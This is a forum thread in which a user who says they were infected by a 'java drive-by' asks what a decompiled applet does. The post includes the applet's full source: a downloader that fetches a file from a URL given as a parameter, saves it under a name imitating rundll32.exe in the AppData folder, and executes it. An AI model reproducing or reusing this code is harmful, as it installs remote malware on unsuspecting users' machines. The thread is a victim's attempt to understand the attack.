Results 1 to 9 of 9
- 11-19-2011, 09:01 AM #1
Member
- Join Date
- Nov 2011
- Location
- australia
- Posts
- 8
- Rep Power
- 0
- 11-19-2011, 12:45 PM #2
Re: What does this mean in a code in java ??
hi
where did you find this code?Skype: petrarsentev
http://TrackStudio.com
-
Re: What does this mean in a code in java ??
Looks like a message sent to a logger.
- 11-20-2011, 08:18 AM #4
Member
- Join Date
- Nov 2011
- Location
- australia
- Posts
- 8
- Rep Power
- 0
Re: What does this mean in a code in java ??
ok here is what i clicked on was a java application what i did was i saved the html page as index.html
i then had this java code after i have read on the internet how to extract the code ,
anyway can someone tell me about this please ! ...
Java Code:import java.applet.Applet; import java.io.BufferedInputStream; import java.io.BufferedOutputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; import java.net.URL; import java.util.logging.Level; import java.util.logging.Logger; public class Kumquat extends Applet { public void start() { String str2 = System.getenv("appdata"); String str3 = getParameter("rucuss"); String str4 = "\\rundll32.exe"; String str5 = str2.concat(str3); BufferedInputStream localBufferedInputStream = null; try { localBufferedInputStream = new BufferedInputStream(new URL(str3).openStream()); } catch (IOException localIOException1) { Logger.getLogger(Kumquat.class.getName()).log(Level.SEVERE, null, localIOException1); } FileOutputStream localFileOutputStream = null; try { localFileOutputStream = new FileOutputStream(str5); } catch (FileNotFoundException localFileNotFoundException) { Logger.getLogger(Kumquat.class.getName()).log(Level.SEVERE, null, localFileNotFoundException); } BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024); byte[] arrayOfByte = new byte[1024]; try { int i; for (long l = 0L; (i = localBufferedInputStream.read(arrayOfByte)) != -1; l += i) localBufferedOutputStream.write(arrayOfByte, 0, i); } catch (IOException localIOException3) { Logger.getLogger(Kumquat.class.getName()).log(Level.SEVERE, null, localIOException3); } try { localBufferedOutputStream.close(); } catch (IOException localIOException4) { Logger.getLogger(Kumquat.class.getName()).log(Level.SEVERE, null, localIOException4); } try { localBufferedInputStream.close(); } catch (IOException localIOException5) { Logger.getLogger(Kumquat.class.getName()).log(Level.SEVERE, null, localIOException5); } try { Runtime.getRuntime().exec(str5); } catch (IOException localIOException6) { Logger.getLogger(Kumquat.class.getName()).log(Level.SEVERE, null, localIOException6); } } public void main(String[] paramArrayOfString) { start(); } }Last edited by Norm; 11-20-2011 at 04:29 PM. Reason: added code tags
- 11-20-2011, 04:28 PM #5
Re: What does this mean in a code in java ??
What is the 'this" you are asking about?anyway can someone tell me about this
- 11-20-2011, 04:32 PM #6
Member
- Join Date
- Nov 2011
- Location
- australia
- Posts
- 8
- Rep Power
- 0
- 11-20-2011, 04:38 PM #7
Re: What does this mean in a code in java ??
If you don't know what you are asking the question about, its very hard for anyone to help.i dont no what it is
Can you explain in detail what you did and what happened after you did it?
- 11-24-2011, 04:05 AM #8
- 11-25-2011, 09:27 AM #9
Member
- Join Date
- Nov 2011
- Location
- australia
- Posts
- 8
- Rep Power
- 0
Re: What does this mean in a code in java ??
it wasnt a web site as such i found out what it is its,
called a term called java drive by .
it infected me i have been asking on fourms about this ...
so you didnt no what it was about ??
and seeing i got hacked i dont think i needed permission to see there source code .
they had a fake web page , when i clicked the link to there (fake) web page a java application opened, it asked me to (run) i ran it then i got infected ..
does this make sense ?? now ??...
This is why i was asking about this beacuse i wanted to no did this infect me or was it something seperate i have had to re-format my pc sinceLast edited by SHY_GURL; 11-25-2011 at 09:38 AM.
Similar Threads
-
Equivalent code in Java native access(JNA)? Type casting of Pointer to java
By Sanjeev in forum Advanced JavaReplies: 1Last Post: 07-14-2011, 01:14 AM -
Translate Vb.net code into Java code
By Radu in forum New To JavaReplies: 5Last Post: 04-12-2011, 09:27 AM -
C server code - Java CLient Code _ TCP Connection Problem
By rmd22 in forum NetworkingReplies: 0Last Post: 02-21-2011, 11:50 AM -
Convert java code to midlet code
By coldvoice05 in forum New To JavaReplies: 1Last Post: 08-12-2009, 11:14 AM -
Convert java code to midlet code
By coldvoice05 in forum Advanced JavaReplies: 1Last Post: 08-09-2009, 01:21 PM


LinkBack URL
About LinkBacks
Reply With Quote

Bookmarks